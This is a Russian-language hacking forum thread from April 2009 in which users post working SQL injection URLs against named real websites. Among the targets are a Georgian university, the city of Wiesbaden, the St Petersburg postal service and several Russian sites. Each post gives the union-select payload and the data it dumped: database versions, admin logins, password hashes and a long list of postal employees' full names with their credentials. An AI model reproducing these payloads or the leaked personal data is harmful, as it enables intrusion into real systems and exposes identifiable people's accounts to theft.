20.04.2009, 15:54
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
Код:
http://oyuniitulga.mn/index.php?com=news&catid=1&newsid=24+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10+limit+1,1
version():5.0.67.d7-ourdelta-log
database():dbotulga
user():dbotulga@72.167.232.53 |
|
|
20.04.2009, 19:50
|
|
Новичок
Регистрация: 19.04.2009
Сообщений: 15
С нами:
8979768
Репутация:
10
|
|
site: (http://www.blackknight.ca)
SQL -
Код:
http://www.blackknight.ca
/products.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
dbm.blackknight.ca@216.251.35.193 : website_en_blackknight_ca : 4.0.27-standard
Код:
http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Admin (table : user)
admin:4dm1n
Код:
http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),concat(login,0x3a,passwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users--
|
|
|
|
20.04.2009, 21:03
|
|
Познающий
Регистрация: 30.01.2009
Сообщений: 64
С нами:
9093390
Репутация:
94
|
|
http://www.ssmu.edu.ge уязвим для sql-injection
http://www.ssmu.edu.ge/t.php?lang=eng&id=5%27+and+0+union+select+1,2,3,4, 5,concat_ws(0x3a,user,password),7,8,9+from+user+li mit+0,1+--+
Список пользователей и их паролей.
Версия БД: 4.1.22-standard-log
Имя БД: ssmuedug_ssmu
Пользователь БД: ssmuedug_ssmu@localhost
Доступа к mysql.user нет. Прав на чтения файлов нет. information_schema нет( в связи с версией БД)
|
|
|
|
21.04.2009, 00:37
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,name),4,5,6,7+from+users/*
ad-neWs.wixwiesbad
http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,user),4,5,6,7+from+mysql. user/*
0b796e382db94bb6xroot
Database Version: 4.0.24
Database name: wiesbaden
User name: wiesbaden@localhost
и file_priv=Y
Последний раз редактировалось Rubaka; 21.04.2009 в 00:40..
Причина: +
|
|
|
|
21.04.2009, 01:54
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Код:
http://old.hfm-detmold.de/eti/readnews.php?id=-1+union+all+select+0,1,concat(user_id,0x3a,username,0x3a,user_password),3,4,5,6+from+phpbb_users+limit+1,1--
Узнал через сайт пасс админа форума 
ид/юзер/пасс:
Код:
2:matthias:acbb7f96c230e9549ed3f8b7b191e519
Сам форум нахадится по урлу:
http://old.hfm-detmold.de/eti/phpBB2/
---------------------------
The End! |
|
|
|
21.04.2009, 04:39
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Почта Санкт-Петербурга и Ленинградской области
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(concat_ws(0x3a,database(),user(),version()), 0x71),0x71),null,null,null,null,null,null,null,nul l,null,null,null,null,null
Код:
<!--<h1>spbpost_db:spbpost@localhost:5.1.30</h1>-->
Очень хитрожопая скуля,ели добился вывода,выводит закрытую в комментарий поэтому смотреть в исходник страницы
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(table_name,0x71),0x71),null,null,null,null,n ull,null,null,null,null,null,null,null,null+from+i nformation_schema.tables+where+table_name+like+'%u ser%'+limit+1,1
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(column_name,0x71),0x71),null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name='users '+limit+x,1
Код:
username
password
fullname
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(concat_ws(0x3a,fullname,username,password),0 x71),0x71),null,null,null,null,null,null,null,null ,null,null,null,null,null+from+users
и через лимит:
Код:
УФПС - ВАСИЛЬЕВ Е. И.:eivasilev:5971581a61e98b89
УФПС - Верендякин Д. А.:daverendyakin:249619d82c53899e
УФПС - Денисенко А. И.:aidenisenko:4de93a382c1cefbd
УФПС - Казимирчак Н. Б.:nbkazimirchak:4133e8c4145182ea
УФПС - Квашко Н. В.:nvkvashko:56c61a2e1f8fcf6d:
УФПС - Кушнирова Д. К.:dkkushnirova:0cb70d5b6ee6a28d:
УФПС - Кушниров К. Д.:kdkushnirov:60073dec39882935:
УФПС - НОВИКОВА О. В.:ovnovikova:5ed106ab23566a7d
УФПС - СЕМЁНОВ С. А.:sasemenov:31228363100e514f
УФПС - СТЁПИН Е. Г.:egstepin:19bf3d905e058879
УФПС - ФИЛАНТ Ю. Н.:yunfilant:188a1ea044b9e97c:
УФПС - ХИБЛИНА Д. О.:dohiblina:7627ea600ca34984:
Моск - Белан А. В.:avbelan:56c61a2e1f8fcf6d
Моск - Зайцев В. Б.:vbzaicev:1558f95336ddc01a:
Моск - Зосимов А.А.:aazosimov:0cccf40a49afde1d
Московский - Колыхалов К.Г:kgkolihalov:48c0557a3364c17f:
Моск - Пахомов А.Е.:aepahomov:42b5c9c41cdde822:
Моск - Рыжов А.Ю.:ayurijov:42b5c9c41cdde822:
Петрогр - Захаров С.В.:svzaharov:74a467fd5f50ba32
Петрогр - Пантюхов Л.В.:lvpantyuhov:249619d82c53899e:
Петрогр - Гегелева О.Д.:odgegeleva:1b1bce234ccb7977:
Петрогр - Патрин С.В.:svpatrin:42b5c9c41cdde822:
Петрогр - Андреев Д.М.:dmandreev:42b5c9c41cdde822
Петрогр - Чебыкин Д.С.:dschebikin:360039a131e12ba4:
Красног - Стрекалов Е.С.:esstrekalov:74ab9fc96d996910:
Красног - Андреева О.Ю.:oyuandreeva:31228363100e514f:
Красног - Сапрыкн С.Г.:sgsaprikin:42b5c9c41cdde822:
Красног - Иванов А.П.:apivanov:42b5c9c41cdde822
Красног - Ковалёв И.В.:ivkovalev:42b5c9c41cdde822:
Красног - Власов А.В.:avvlasov:3945ee27485d1be7:
Красног - Бушкевич В.А:vabushkevich:5d4e81cd6a5cee2d:
Красног - Буланов Ю.В.:yuvbulanov:42b5c9c41cdde822:
Красног - Петров И.М.:impetrov:5419209c7109682d:
Краснос - Курдюмов В. О.:vokurdyumov:3c53f6f0259384e7:
Краснос - Филатов Е. Н.:enfilatov:10e71cf53618b80e:
Пушк - Войтов А.Г.:agvoitov:69e56291380af837:
Пушк - Королев К.А.:kakorolev:36e38078653714a2
Пушк - Васильев С.А.:savasilev:459d78f677e83e0e
Пушк - Бондарчук Г.С.:gsbondarchuk:49af13841472f1c9:
Сестрор - Выжлов А. Н.:anvijlov:7f11c3ed3c0215bc:
СПБПочт - Александрова А.Н.:analexandrova:343f43ab46a63bb3
СПБПочт - Байкова Г.Н.:gnbaykova:3841a56150fb0ffe
СПБПочт - Шелудяева Ю.А.:yuasheludyaeva:14e97246581da732:
СПБПочт - Макаров Д.В.:dvmakarov:00c36ac01f7eb0e4
СПБПочт - Лескович В.В.:vvleskovich:25bcc4d8285a70e6
СПБПочт - Сонина Л.И.:lisonina:1ebef14a0d5b88fa:
СПБПочт - Сергеев А.А.:aasergeev:440f30047bdce88f:
СПБПочт - Бакаева С.С.:ssbakaeva:5792afc75549b813:
СПБПочт - Семенова С.И.:sisemenova:05a25cd57ac0a70f:
СПБПочт - Крушкина О.И.:oikrushkina:37fda15d52021b47:
Инна Гайда:inna:best:
УФПС - Балалайкин А. А.:aabalalaykin:21ddb5210ad35254:
УФПС - РАСТЕГАЕВ Д. В.:dvrastegaev:68a4d8e470aad708:
Моск - Цвирко И.Н:incvirko:418d2e19518fd5a1:
Петрогр - Белов А.А.:aabelov:10b42b7c62952d6b:
Красног - Коренев К.А:kakorenev:56ef67c845d53402:
Краснос - Веселовский Д. А.:daveselovskiy:6450bf303fbef463:
Пушк - Скирда С.А.:saskirda:08803541792dd5a5:
Сестр - Заграничный Ю. Е.:yuezagranichiy:2981663432c7d6e8:
СПБПочт - Рыбак Н.В.:nvribak:5be14dc352d5cccb:
Андрей Гурский:andi:santitimes:
админка:http://spbpost.ru/admin/
|
|
|
|
21.04.2009, 04:47
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
Ещё одна слепая скуля на хакере =)
http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+1=1--
----добавка---
http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+77=ascii(substring (@@version,1,1))--
вот так - с запросом, чтобы не писали, в репу, что мол не скуля там. Скуля-скуля, ка и описал выше - блинд
Последний раз редактировалось o3,14um; 21.04.2009 в 06:41..
|
|
|
|
21.04.2009, 06:38
|
|
Познающий
Регистрация: 14.09.2008
Сообщений: 38
С нами:
9292218
Репутация:
37
|
|
http://top.zenon.net/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.biz.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.cooking.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.travel.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.magelan.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.anekdot.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://www.toptop.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.lgg.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.auto.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.rosmebel.com/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
Последний раз редактировалось jokester; 21.04.2009 в 10:41..
Причина: убрал дубли
|
|
|
|
21.04.2009, 12:41
|
|
Новичок
Регистрация: 14.07.2008
Сообщений: 11
С нами:
9382614
Репутация:
8
|
|
PostgreSQL 8.1.3 on i386-portbld-freebsd5.4, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728
http://www.mediat.com.ua/ann.php?type=9999+union+select+null,null,null,tabl e_name,null,null+FROM+INFORMATION_SCHEMA.TABLES--#2618
http://www.mediat.com.ua/ann.php?type=9999+union+select+null,null,null,usen ame,passwd,null+FROM+pg_user--#2618
|
|
|
|
21.04.2009, 13:05
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Alexa Rank:31,715
http://squakenet.com/computer_games/download.asp?game=-4869+union+select+version(),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19/*&title=Bundesliga-Manager-Professional
Version: 4.0.20a-nt
User: squakenet@localhost
Dbname: squakenet
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
